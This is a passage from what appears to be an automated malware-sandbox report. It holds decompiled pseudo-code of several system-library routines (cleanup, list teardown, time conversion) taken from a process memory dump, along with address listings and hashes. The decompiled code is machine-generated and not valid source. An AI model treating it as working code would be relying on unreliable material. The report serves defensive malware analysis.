						_t134[6] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffd;
				}
				if((_t123 & 0x00000004) != 0) {
					if(_t134[7] != _t131) {
						if(( *_t134 & 0x00000004) != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[7]);
						}
						_t134[7] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffb;
				}
				if((_t123 & 0x00000008) != 0) {
					if(_t134[8] != _t131) {
						if(( *_t134 & 0x00000008) != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[8]);
						}
						_t134[8] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffff7;
				}
				if((_t123 & 0x00000010) != 0) {
					_t97 = _t134[9];
					if(_t97 != 0) {
						if(( *_t134 & 0x00000010) != 0) {
							 *(_t97 + 0x20) =  *(_t97 + 0x20) & 0xffffffbf;
							E04CD332D(_t134[9]);
						}
						_t134[9] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffef;
				}
				if((_t123 & 0x00000020) != 0) {
					_t98 = _t134[0xa];
					if(_t98 != 0) {
						if(( *_t134 & 0x00000020) != 0) {
							 *(_t98 + 0x20) =  *(_t98 + 0x20) & 0xffffffbf;
							E04CD332D(_t134[0xa]);
						}
						_t134[0xa] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffdf;
				}
				if((_t123 & 0x00000040) != 0) {
					_t99 = _t134[0xd];
					if(_t99 != 0) {
						if(( *_t134 & 0x00000040) != 0) {
							 *(_t99 + 0x20) =  *(_t99 + 0x20) & 0xffffffbf;
							E04CD332D(_t134[0xd]);
						}
						_t134[0xd] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffbf;
				}
				if(_t123 < 0) {
					_t100 = _t134[0xc];
					if(_t100 != 0) {
						if(( *_t134 & 0x00000080) != 0) {
							 *(_t100 + 0x20) =  *(_t100 + 0x20) & 0xffffffbf;
							E04CD332D(_t134[0xc]);
						}
						_t134[0xc] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffff7f;
				}
				_t125 = 0x200;
				if((0x00000200 & _t123) != 0) {
					_t101 = _t134[0xe];
					if(_t101 != 0) {
						if(( *_t134 & 0x00000200) != 0) {
							 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0xffffffbf;
							_t125 = _t134[0xe];
							E04CD332D(_t134[0xe]);
						}
						_t134[0xe] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffdff;
				}
				if((0x00000800 & _t123) != 0) {
					if(_t134[0x14] != _t131) {
						if(( *_t134 & 0x00000800) != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[0x14]);
						}
						_t134[0x14] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffff7ff;
				}
				if((_t123 & 0x00000fff) != 0 && _t134[0xf] != _t131) {
					E04CACEF0(_t125, _t134[0xf], _t123);
					if(_t134[0xf] != _t131) {
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[0xf]);
					}
					_t134[0xf] = _t131;
				}
			}

0x04cacefb
0x04caceff
0x04cacf03
0x04d0a50a
0x04d0a50a
0x04cacf82
0x04cacf8a
0x04cacf8a
0x04cacf09
0x04cacf0e
0x00000000
0x00000000
0x04cacf1a
0x04d0a3b7
0x04d0a3b7
0x04cacf23
0x04cacfcf
0x04d0a3c4
0x04d0a3d3
0x04d0a3d3
0x04d0a3d8
0x04d0a3d8
0x04cacfd5
0x04cacfd5
0x04cacf2c
0x04cacfe0
0x04d0a3e3
0x04d0a3f2
0x04d0a3f2
0x04d0a3f7
0x04d0a3f7
0x04cacfe6
0x04cacfe6
0x04cacf35
0x04cacf90
0x04d0a402
0x04d0a411
0x04d0a411
0x04d0a416
0x04d0a416
0x04cacf96
0x04cacf96
0x04cacf3a
0x04cacf9e
0x04d0a421
0x04d0a430
0x04d0a430
0x04d0a435
0x04d0a435
0x04cacfa4
0x04cacfa4
0x04cacf3f
0x04cacfa9
0x04cacfae
0x04d0a440
0x04d0a442
0x04d0a449
0x04d0a449
0x04d0a44e
0x04d0a44e
0x04cacfb4
0x04cacfb4
0x04cacf44
0x04cacfb9
0x04cacfbe
0x04d0a459
0x04d0a45b
0x04d0a462
0x04d0a462
0x04d0a467
0x04d0a467
0x04cacfc4
0x04cacfc4
0x04cacf49
0x04cacfee
0x04cacff3
0x04d0a472
0x04d0a474
0x04d0a47b
0x04d0a47b
0x04d0a480
0x04d0a480
0x04cacff9
0x04cacff9
0x04cacf51
0x04cad001
0x04cad006
0x04d0a48b
0x04d0a48d
0x04d0a494
0x04d0a494
0x04d0a499
0x04d0a499
0x04cad00c
0x04cad00c
0x04cacf57
0x04cacf5e
0x04cad017
0x04cad01c
0x04d0a4a3
0x04d0a4a5
0x04d0a4a9
0x04d0a4ac
0x04d0a4ac
0x04d0a4b1
0x04d0a4b1
0x04cad022
0x04cad022
0x04cacf6b
0x04d0a4bc
0x04d0a4c0
0x04d0a4cf
0x04d0a4cf
0x04d0a4d4
0x04d0a4d4
0x04d0a4d7
0x04d0a4d7
0x04cacf77
0x04d0a4e6
0x04d0a4ee
0x04d0a4fd
0x04d0a4fd
0x04d0a502
0x04d0a502

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8300100fa44f8cd702152e592a25aad04b6e1d730c99cde3d70f7b4599d94d13
Instruction ID: a9d74a4f458e116a1c26e8c8ac3958de6a61e91844b654df7c77889799221c02
Opcode Fuzzy Hash: 8300100fa44f8cd702152e592a25aad04b6e1d730c99cde3d70f7b4599d94d13
Instruction Fuzzy Hash: FF717971641B429BD7318F26CA44B22B7E2BF60769F184B2DD9D706AE1E730F451EB40

Uniqueness

Uniqueness Score: -1.00%

Function 04D78E26 Relevance: .2, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E04D78E26(signed int __ecx) {
				signed int _v8;
				signed int _v11;
				intOrPtr _v15;
				short _v41;
				char _v47;
				intOrPtr _v48;
				signed int _v52;
				char _v55;
				signed int _v56;
				char _v60;
				intOrPtr _v63;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				signed int _t65;
				char* _t71;
				void* _t72;
				signed int _t92;
				signed int _t93;
				void* _t94;
				signed char _t96;
				intOrPtr* _t103;
				signed int _t112;
				signed int _t113;
				signed int _t119;
				signed int _t120;
				void* _t124;
				signed int _t126;
				signed int _t128;
				signed int* _t130;
				void* _t131;
				signed int _t134;
				signed int _t135;

				_t95 = __ecx;
				_t137 = (_t135 & 0xfffffff8) - 0x3c;
				_v8 =  *0x4dab370 ^ (_t135 & 0xfffffff8) - 0x0000003c;
				_t2 = _t95 + 0x44; // 0x44
				_t128 = _t2;
				_v56 = __ecx;
				_v60 = __ecx;
				_t59 =  *_t128;
				_v52 = _t128;
				if(( *(_t128 + 4) & 0x00000001) != 0) {
					if(_t59 == 0) {
						_t59 = 0;
					} else {
						_t59 = _t59 ^ _t128;
					}
				}
				_t96 =  *(_t128 + 4);
				_t92 = _t96 & 1;
				if(_t59 == 0) {
					L22:
					 *_t128 =  *_t128 & 0x00000000;
					 *(_t128 + 4) =  *(_t128 + 4) & 0x00000000;
					if((_t96 & 0x00000001) != 0) {
						 *(_t128 + 4) = 1;
					}
					_t122 = _v60;
					_t93 = _v60 + 0x210;
					while(1) {
						_t129 =  *_t93;
						if( *_t93 == 0) {
							break;
						}
						E04D7FD27(_t122 + 0x200, _t129 ^ _t93);
						E04D8004A(_t122 + 0x200, _t129 ^ _t93, 1);
					}
					E04D76679(_v60 + 0x2c0);
					E04D7B707();
					E04D7B707();
					_t103 = _v60;
					_v48 =  *((intOrPtr*)(_t103 + 4));
					_t65 =  *((intOrPtr*)(_t103 + 0xc0)) - _t103;
					_v52 =  *_t103;
					_v56 = _t65;
					_push( *((intOrPtr*)(_t103 + 4)));
					_push( *_t103);
					if(( *(_t103 + 0x16) & 0x00000001) == 0) {
						asm("sbb eax, eax");
						_push((_t65 & 0x01000000) + 0x8000);
						E04D78845( &_v60,  &_v56);
					} else {
						E04D79629(_t103);
					}
					E04D79A57( &_v55, 0);
					if(E04CC3C40() == 0) {
						_t71 = 0x7ffe0388;
					} else {
						_t71 = ( *[fs:0x30])[0x14] + 0x22e;
					}
					if( *_t71 != 0) {
						E04D6D9C6(_v63);
					}
					_t72 = E04CC3C40();
					_t130 = 0x7ffe0380;
					if(_t72 == 0) {
						_t73 = 0x7ffe0380;
					} else {
						_t73 = ( *[fs:0x30])[0x14] + 0x226;
					}
					if( *_t73 != 0) {
						_t73 =  *[fs:0x30];
						if((( *[fs:0x30])[0x90] & 0x00000001) != 0) {
							if(E04CC3C40() != 0) {
								_t130 = ( *[fs:0x30])[0x14] + 0x226;
							}
							_v15 = _v63;
							_v41 = 0x1023;
							_push( &_v47);
							_push(4);
							_push(0x402);
							_push( *_t130 & 0x000000ff);
							_t73 = E04CF2F90();
						}
					}
					_pop(_t124);
					_pop(_t131);
					_pop(_t94);
					return E04CF4B50(_t73, _t94, _v11 ^ _t137, 0, _t124, _t131);
				}
				_t134 = _v56;
				while(1) {
					L6:
					_t112 =  *_t59;
					if(_t112 != 0) {
						break;
					}
					_t113 =  *(_t59 + 4);
					if(_t113 == 0) {
						_t126 =  *(_t59 + 8) & 0xfffffffc;
						if(_t92 != 0 && _t126 != 0) {
							_t126 = _t126 ^ _t59;
						}
						E04D7A464(_t92, _t113, _t59, _t134);
						if(_t126 == 0) {
							_t128 = _v52;
							_t96 =  *(_t128 + 4);
							goto L22;
						} else {
							_t59 = _t126;
							continue;
						}
					}
					_t120 = _t59;
					if(_t92 == 0) {
						_t59 = _t113;
					} else {
						_t59 = _t59 ^ _t113;
					}
					 *(_t120 + 4) =  *(_t120 + 4) & 0x00000000;
				}
				_t119 = _t59;
				if(_t92 == 0) {
					_t59 = _t112;
				} else {
					_t59 = _t59 ^ _t112;
				}
				 *_t119 =  *_t119 & 0x00000000;
				goto L6;
			}

0x04d78e26
0x04d78e2e
0x04d78e38
0x04d78e3e
0x04d78e3e
0x04d78e41
0x04d78e45
0x04d78e4d
0x04d78e50
0x04d78e54
0x04d78e58
0x04d78e5e
0x04d78e5a
0x04d78e5a
0x04d78e5a
0x04d78e58
0x04d78e60
0x04d78e66
0x04d78e6b
0x04d78ec7
0x04d78ec7
0x04d78eca
0x04d78ed1
0x04d78ed3
0x04d78ed3
0x04d78ed7
0x04d78edb
0x04d78ee1
0x04d78ee1
0x04d78ee5
0x00000000
0x00000000
0x04d78ef1
0x04d78f00
0x04d78f00
0x04d78f11
0x04d78f20
0x04d78f2f
0x04d78f34
0x04d78f3d
0x04d78f47
0x04d78f49
0x04d78f4d
0x04d78f55
0x04d78f58
0x04d78f5a
0x04d78f6e
0x04d78f7a
0x04d78f7b
0x04d78f5c
0x04d78f5c
0x04d78f5c
0x04d78f86
0x04d78f92
0x04d78fa4
0x04d78f94
0x04d78f9d
0x04d78f9d
0x04d78fac
0x04d78fb2
0x04d78fb2
0x04d78fb7
0x04d78fbc
0x04d78fc8
0x04d78fd7
0x04d78fca
0x04d78fd3
0x04d78fd3
0x04d78fdc
0x04d78fde
0x04d78feb
0x04d78ff4
0x04d78fff
0x04d78fff
0x04d79007
0x04d79010
0x04d79019
0x04d7901a
0x04d7901c
0x04d79024
0x04d79025
0x04d79025
0x04d78feb
0x04d7902e
0x04d7902f
0x04d79030
0x04d7903b
0x04d7903b
0x04d78e6d
0x04d78e71
0x04d78e71
0x04d78e71
0x04d78e75
0x00000000
0x00000000
0x04d78e88
0x04d78e8d
0x04d78ea4
0x04d78ea9
0x04d78eaf
0x04d78eaf
0x04d78eb3
0x04d78eba
0x04d78ec0
0x04d78ec4
0x00000000
0x04d78ebc
0x04d78ebc
0x00000000
0x04d78ebc
0x04d78eba
0x04d78e8f
0x04d78e93
0x04d78e99
0x04d78e95
0x04d78e95
0x04d78e95
0x04d78e9b
0x04d78e9b
0x04d78e77
0x04d78e7b
0x04d78e81
0x04d78e7d
0x04d78e7d
0x04d78e7d
0x04d78e83
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369de32d1e6303817a2f5b78d850980651052396f821d7565c2f04225cacdc0c
Instruction ID: 11490933cadcfbf8997087030c5659b01ad1bca0cdd48bb2b862860508c30378
Opcode Fuzzy Hash: 369de32d1e6303817a2f5b78d850980651052396f821d7565c2f04225cacdc0c
Instruction Fuzzy Hash: 5C61AC327147418BE315EF24C858B6AB7E1BF80718F1849ADF8958B291FB36F805D791

Uniqueness

Uniqueness Score: -1.00%

Function 04CDECF3 Relevance: .2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E04CDECF3(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t62;
				intOrPtr _t69;
				void* _t72;
				intOrPtr* _t76;
				signed int _t89;
				void* _t91;
				intOrPtr* _t94;
				intOrPtr* _t99;
				intOrPtr _t104;
				intOrPtr* _t105;
				signed int _t109;
				void* _t114;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t50 =  *0x4da664c; // 0x2f1c538
				_v12 = __edx;
				_t89 = 0;
				_t109 = __ecx;
				_v8 = _v8 & 0;
				L04CB53C0(_t50 + 4);
				_t104 =  *0x4da664c; // 0x2f1c538
				_t105 = _t104 + 8;
				_t94 =  *_t105;
				while(_t94 != _t105) {
					_t114 = _t94 - 0x1c;
					_t62 =  *((intOrPtr*)(_t109 + 0xc));
					if( *((intOrPtr*)(_t114 + 0x10)) !=  *((intOrPtr*)(_t109 + 8)) ||  *((intOrPtr*)(_t114 + 0x14)) != _t62 ||  *((intOrPtr*)(_t114 + 8)) !=  *_t109) {
						L20:
						_t94 =  *_t94;
						continue;
					} else {
						_t64 =  *((intOrPtr*)(_t114 + 0xc));
						if( *((intOrPtr*)(_t114 + 0xc)) !=  *((intOrPtr*)(_t109 + 4))) {
							goto L20;
						}
						_t12 = _t114 + 0x28; // 0x28
						_t91 = _t12;
						L04CC2330(_t64, _t91);
						if( *(_t114 + 0x5c) == 2) {
							__eflags = _v12;
							if(_v12 == 0) {
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *(_t114 + 0x58));
								 *(_t114 + 0x58) =  *(_t114 + 0x58) & 0x00000000;
								 *(_t114 + 0x5c) =  *(_t114 + 0x5c) & 0x00000000;
								L8:
								asm("lock inc dword [esi+0x50]");
								 *(_t114 + 0x5c) = 1;
								E04CC24D0(_t91);
								_t69 =  *0x4da664c; // 0x2f1c538
								_t123 = _t69 + 4;
								E04CB52F0(_t94, _t69 + 4);
								while(1) {
									_t92 = 0;
									_t72 = E04CDEE48(0, _t109, _t114, _t109, _t114, _t123, 0);
									_t124 = _t72 - 0xc000022d;
									if(_t72 == 0xc000022d) {
										_t92 = 0xc000022d;
									}
									if(E04CDEE48(_t92, _t109, _t114, _t109, _t114, _t124, 1) == 0xc000022d) {
										_t89 = 0xc000022d;
									}
									_t16 = _t114 + 0x28; // 0x28
									L04CC2330(_t16, _t16);
									_v8 = _v8 + 1;
									_t19 = _t114 + 0x2c; // 0x2c
									_t99 = _t19;
									_t76 =  *_t99;
									while(_t76 != _t99) {
										 *(_t76 + 0x60) =  *(_t76 + 0x60) & 0x00000000;
										_t76 =  *_t76;
									}
									if( *(_t114 + 0x58) != 0) {
										_t109 =  *(_t114 + 0x58);
										_t42 = _t114 + 0x28; // 0x28
										 *(_t114 + 0x58) =  *(_t114 + 0x58) & 0x00000000;
										E04CC24D0(_t42);
										continue;
									}
									if(_t89 != 0) {
										__eflags = _t89 - 0xc000022d;
										if(_t89 == 0xc000022d) {
											 *(_t114 + 0x58) = _t109;
											 *(_t114 + 0x5c) = 2;
											E04D3C41F(_t114);
										}
										L17:
										_t26 = _t114 + 0x28; // 0x28
										E04CC24D0(_t26);
										L04CDEC45(_t114);
										L18:
										if(_v8 > 1) {
											_t47 = _t109 + 8; // 0xb
											_push(0);
											_push(0);
											_push(_t89);
											_push( *((intOrPtr*)(_t109 + 0x18)));
											_push(_t109);
											E04CF38C0();
											__eflags = _t89;
											if(_t89 == 0) {
												E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
											}
											_t89 = 0x80;
										}
										return _t89;
									}
									 *(_t114 + 0x5c) =  *(_t114 + 0x5c) & _t89;
									if( *((intOrPtr*)(_t114 + 0x18)) != _t89) {
										__eflags =  *((intOrPtr*)(_t109 + 0x10)) -  *((intOrPtr*)(_t114 + 0x18));
										if( *((intOrPtr*)(_t109 + 0x10)) -  *((intOrPtr*)(_t114 + 0x18)) > 0) {
											goto L16;
										}
										goto L17;
									}
									L16:
									 *((intOrPtr*)(_t114 + 0x18)) =  *((intOrPtr*)(_t109 + 0x10));
									goto L17;
								}
							}
							_push(_t91);
							L27:
							E04CC24D0();
							_t89 = 0x80;
							break;
						}
						if( *(_t114 + 0x5c) == 1) {
							__eflags = _v12;
							_push(_t91);
							if(_v12 != 0) {
								goto L27;
							}
							 *(_t114 + 0x58) = _t109;
							E04CC24D0();
							_t89 = 0x103;
							break;
						}
						goto L8;
					}
				}
				_t53 =  *0x4da664c; // 0x2f1c538
				E04CB52F0(_t94, _t53 + 4);
				goto L18;
			}

0x04cdecf8
0x04cdecf9
0x04cdecfa
0x04cded05
0x04cded08
0x04cded0a
0x04cded0c
0x04cded10
0x04cded15
0x04cded1b
0x04cded1e
0x04cded20
0x04cded2b
0x04cded31
0x04cded34
0x04cdee1d
0x04cdee1d
0x00000000
0x04cded4e
0x04cded4e
0x04cded54
0x00000000
0x00000000
0x04cded5a
0x04cded5a
0x04cded5e
0x04cded67
0x04d1fc5b
0x04d1fc5f
0x04d1fc7f
0x04d1fc84
0x04d1fc88
0x04cded77
0x04cded77
0x04cded7c
0x04cded83
0x04cded88
0x04cded8d
0x04cded91
0x04cded96
0x04cded96
0x04cded9d
0x04cdeda7
0x04cdeda9
0x04d1fcaa
0x04d1fcaa
0x04cdedc1
0x04d1fcb1
0x04d1fcb1
0x04cdedc7
0x04cdedcb
0x04cdedd0
0x04cdedd3
0x04cdedd3
0x04cdedd6
0x04cdedd8
0x04cdee24
0x04cdee28
0x04cdee28
0x04cdede0
0x04d1fcb8
0x04d1fcbb
0x04d1fcbe
0x04d1fcc3
0x00000000
0x04d1fcc3
0x04cdede8
0x04d1fcd2
0x04d1fcd4
0x04d1fcdc
0x04d1fcdf
0x04d1fce6
0x04d1fce6
0x04cdedfc
0x04cdedfc
0x04cdee00
0x04cdee07
0x04cdee0c
0x04cdee10
0x04d1fcf2
0x04d1fcf5
0x04d1fcf6
0x04d1fcf7
0x04d1fcf8
0x04d1fcfb
0x04d1fcfd
0x04d1fd02
0x04d1fd04
0x04d1fd11
0x04d1fd11
0x04d1fd16
0x04d1fd16
0x04cdee1c
0x04cdee1c
0x04cdedee
0x04cdedf4
0x04cdee32
0x04cdee34
0x00000000
0x00000000
0x00000000
0x04cdee36
0x04cdedf6
0x04cdedf9
0x00000000
0x04cdedf9
0x04cded96
0x04d1fc61
0x04d1fc62
0x04d1fc62
0x04d1fc67
0x00000000
0x04d1fc67
0x04cded71
0x04d1fc91
0x04d1fc95
0x04d1fc96
0x00000000
0x00000000
0x04d1fc98
0x04d1fc9b
0x04d1fca0
0x00000000
0x04d1fca0
0x00000000
0x04cded71
0x04cded34
0x04cdee38
0x04cdee41
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1e26e115c9791a694867760b0c19561b0bae20fe4811c436f46a06fee364e0b
Instruction ID: 6d487892bcac46b128192d95928d944be2df8c2e1848a06d02d6abf8c167c8dd
Opcode Fuzzy Hash: d1e26e115c9791a694867760b0c19561b0bae20fe4811c436f46a06fee364e0b
Instruction Fuzzy Hash: 7F51AF71600B40EFEB24DF5AC884A6BB3EAFB4431DF14495DD6428BA10DB74F984DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04CDCD10 Relevance: .2, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04CDCD10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
				short _v46;
				char _v56;
				signed int _t69;
				intOrPtr* _t70;
				signed int _t71;
				signed int _t75;
				signed int _t91;
				signed int _t92;
				void* _t93;
				signed int _t95;
				signed int _t98;
				void* _t99;
				signed int _t104;
				char* _t106;
				signed int _t108;
				signed int _t109;
				char* _t112;
				intOrPtr _t115;
				intOrPtr _t119;
				char _t120;

				_t106 =  *((intOrPtr*)( *[fs:0x30] + 0x470));
				if(_t106 == 0 ||  *_t106 == 0) {
					return E04CDCDE3(_a4, _a8, __eflags);
				} else {
					_v28 =  *((intOrPtr*)(_t106 + 4));
					asm("lock or [eax], ecx");
					_t69 = _a12;
					_t104 =  *( *[fs:0x30] + 0x474) & 0x00000001;
					_v12 = _t104;
					if(_t69 != 0) {
						_v16 =  *_t69;
						_v20 =  *((intOrPtr*)(_t69 + 4));
					} else {
						_v16 = _v16 & _t69;
						_v20 = _v20 & _t69;
					}
					_t70 = _a4;
					_t91 = 0x989680;
					_t119 =  *_t70;
					_t115 =  *((intOrPtr*)(_t70 + 4));
					_t71 = 0;
					_v24 = _v24 & 0;
					_v8 = 0;
					if(_v28 > 0) {
						_t108 = _t106 + 8;
						__eflags = _t108;
						_v12 = _t104;
						_v12 = _t108;
						do {
							_t92 =  *_t108;
							_t109 =  *(_t108 + 4);
							__eflags = _t109;
							if(__eflags < 0) {
								L30:
								_t93 = _t92 - _v16;
								asm("sbb edx, [ebp-0x10]");
								__eflags = _t115 - (_t109 & 0x7fffffff);
								if(__eflags < 0) {
									break;
								}
								if(__eflags > 0) {
									L33:
									_t71 = _t71 - 1;
									__eflags = _t71;
									L34:
									_v8 = _t71;
									goto L35;
								}
								__eflags = _t119 - _t93;
								if(__eflags < 0) {
									break;
								}
								goto L33;
							}
							if(__eflags > 0) {
								L17:
								_t99 = _t92 - _v16;
								asm("sbb edx, [ebp-0x10]");
								_v32 = _t99 + 0x1312d00;
								asm("adc eax, 0x0");
								__eflags = _t115 - _t109;
								if(__eflags < 0) {
									L21:
									_v32 = _t99 + 0x989680;
									asm("adc eax, 0x0");
									__eflags = _t115 - _t109;
									if(__eflags < 0) {
										L25:
										__eflags = _t115 - _t109;
										if(__eflags < 0) {
											break;
										}
										if(__eflags > 0) {
											L28:
											_t104 = _t104 | 0x00000004;
											__eflags = _t104;
											L29:
											_t71 = _v8;
											goto L35;
										}
										__eflags = _t119 - _t99;
										if(__eflags < 0) {
											break;
										}
										goto L28;
									}
									if(__eflags > 0) {
										L24:
										_t104 = _t104 | 0x00000002;
										goto L29;
									}
									__eflags = _t119 - _v32;
									if(_t119 < _v32) {
										goto L25;
									}
									goto L24;
								}
								if(__eflags > 0) {
									L20:
									_t71 = _v8 + 1;
									goto L34;
								}
								__eflags = _t119 - _v32;
								if(_t119 < _v32) {
									goto L21;
								}
								goto L20;
							}
							__eflags = _t92;
							if(_t92 < 0) {
								goto L30;
							}
							goto L17;
							L35:
							_t98 = _v24 + 1;
							_t108 = _v12 + 8;
							_v24 = _t98;
							_v12 = _t108;
							__eflags = _t98 - _v28;
						} while (__eflags < 0);
						_t71 = _v8;
						_t91 = 0x989680;
						_v12 = _t104;
						goto L5;
					} else {
						L5:
						_t120 = _t119 - _t71 * _t91;
						_v40 = _t120;
						asm("sbb edi, edx");
						_v36 = _t115;
						_t95 = _t104 & 0x00000002;
						_t131 = _t95;
						if(_t95 != 0) {
							_v40 = _t120 - 0x989680;
							asm("sbb edi, 0x0");
							_v36 = _t115;
						}
						_t112 =  &_v56;
						E04CDCDE3( &_v40, _t112, _t131);
						_t75 = _v12;
						if((_t75 & 0x00000001) != 0) {
							__eflags = _t95;
							if(_t95 != 0) {
								_v46 = _v46 + 1;
							}
						} else {
							if((_t75 & 0x00000004) != 0) {
								asm("cdq");
								_t75 = _v44 - _t112 >> 1;
								_v44 = _t75;
							} else {
								_t75 = _v44;
							}
							if(_t95 != 0) {
								asm("cdq");
								_t75 = (_t75 - _t112 >> 1) + 0x1f4;
								_v44 = _t75;
							}
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						return _t75;
					}
				}
			}

0x04cdcd1e
0x04cdcd26
0x00000000
0x04cdcd35
0x04cdcd3c
0x04cdcd43
0x04cdcd4d
0x04cdcd56
0x04cdcd59
0x04cdcd5e
0x04cdcdd8
0x04cdcdde
0x04cdcd60
0x04cdcd60
0x04cdcd63
0x04cdcd63
0x04cdcd66
0x04cdcd69
0x04cdcd6e
0x04cdcd70
0x04cdcd73
0x04cdcd75
0x04cdcd78
0x04cdcd7e
0x04d1e9f6
0x04d1e9f6
0x04d1e9f9
0x04d1e9fc
0x04d1e9ff
0x04d1e9ff
0x04d1ea01
0x04d1ea04
0x04d1ea06
0x04d1ea65
0x04d1ea6b
0x04d1ea6e
0x04d1ea71
0x04d1ea73
0x00000000
0x00000000
0x04d1ea75
0x04d1ea7b
0x04d1ea7b
0x04d1ea7b
0x04d1ea7c
0x04d1ea7c
0x00000000
0x04d1ea7c
0x04d1ea77
0x04d1ea79
0x00000000
0x00000000
0x00000000
0x04d1ea79
0x04d1ea08
0x04d1ea0e
0x04d1ea0e
0x04d1ea13
0x04d1ea1b
0x04d1ea20
0x04d1ea23
0x04d1ea25
0x04d1ea34
0x04d1ea3b
0x04d1ea40
0x04d1ea43
0x04d1ea45
0x04d1ea53
0x04d1ea53
0x04d1ea55
0x00000000
0x00000000
0x04d1ea57
0x04d1ea5d
0x04d1ea5d
0x04d1ea5d
0x04d1ea60
0x04d1ea60
0x00000000
0x04d1ea60
0x04d1ea59
0x04d1ea5b
0x00000000
0x00000000
0x00000000
0x04d1ea5b
0x04d1ea47
0x04d1ea4e
0x04d1ea4e
0x00000000
0x04d1ea4e
0x04d1ea49
0x04d1ea4c
0x00000000
0x00000000
0x00000000
0x04d1ea4c
0x04d1ea27
0x04d1ea2e
0x04d1ea31
0x00000000
0x04d1ea31
0x04d1ea29
0x04d1ea2c
0x00000000
0x00000000
0x00000000
0x04d1ea2c
0x04d1ea0a
0x04d1ea0c
0x00000000
0x00000000
0x00000000
0x04d1ea7f
0x04d1ea85
0x04d1ea86
0x04d1ea89
0x04d1ea8c
0x04d1ea8f
0x04d1ea8f
0x04d1ea98
0x04d1ea9b
0x04d1eaa0
0x00000000
0x04cdcd84
0x04cdcd84
0x04cdcd88
0x04cdcd8a
0x04cdcd8d
0x04cdcd8f
0x04cdcd92
0x04cdcd92
0x04cdcd95
0x04d1eaaf
0x04d1eab2
0x04d1eab5
0x04d1eab5
0x04cdcd9b
0x04cdcda1
0x04cdcda6
0x04cdcdab
0x04d1eae3
0x04d1eae5
0x04d1eaeb
0x04d1eaeb
0x04cdcdb1
0x04cdcdb3
0x04d1eac1
0x04d1eac4
0x04d1eac6
0x04cdcdb9
0x04cdcdb9
0x04cdcdb9
0x04cdcdbf
0x04d1ead0
0x04d1ead5
0x04d1eada
0x04d1eada
0x04cdcdbf
0x04cdcdcb
0x04cdcdcc
0x04cdcdcd
0x04cdcdce
0x00000000
0x04cdcdd1
0x04cdcd7e

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
Instruction ID: 3c7f9e96a0479614280c694c431302ff16ea777d73719d3bfff09e0f9f8d58b8
Opcode Fuzzy Hash: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
Instruction Fuzzy Hash: 69517275E0024AEBDB14CFA8D9806EDBBF2FF48314F198566DD16A7210D734BA41DB90

